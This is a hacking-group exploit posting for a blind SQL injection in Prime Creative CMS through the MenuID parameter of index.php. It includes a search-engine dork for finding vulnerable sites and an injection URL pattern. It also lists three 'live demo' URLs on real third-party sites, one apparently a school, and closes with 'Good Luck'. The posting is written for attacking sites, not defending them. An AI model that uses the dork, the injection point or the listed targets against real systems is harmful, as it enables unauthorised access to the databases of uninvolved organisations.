010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010 1
0 0
1 WWW.DataCoders.Org 1
010101010101010101010101010101010101010101010101010101010
############################################################################
# Exploit Title: prime creative CMS BSQL Injection Vulnerability #
# Date: 03/26/2012 #
# Author: H-SK33PY #
# Vendor Link: http://www.primecreative.com/ #
# Version : N/A #
# Platform / Tested on: php/linux #
# Dork: inurl:index.php?MenuID= & intext:developed by prime creative #
# Category: webapplications #
# Code : [SQL injection] #
# Our Website: http://www.datacoders.org/ #
############################################################################
After after use Sting (') and find bug for injection at sites run SQL Inject :
example :
http://[PATH]/index.php?MenuID=[BSQL injection]
Live demo :
http://www.snugpak.com/index.php?MenuID=160-133[bsql injection]
http://www.netherleighandrossefieldschool.co.uk/index.php?MenuID=-168[bsql injection]
http://testing.primecreative.com/ocean/index.php?MenuID=288-288-288[bsql injection]
Good Luck
############################################################################################
# #
# We Are: H-SK33PY | Immortal Boy | D4rkC0d3 | r00t | v30sharp | ARTA #
# #
# And All Iranian DataCoders Members #
# #
# Don't Forget WwW.DataCoders.Org #
############################################################################################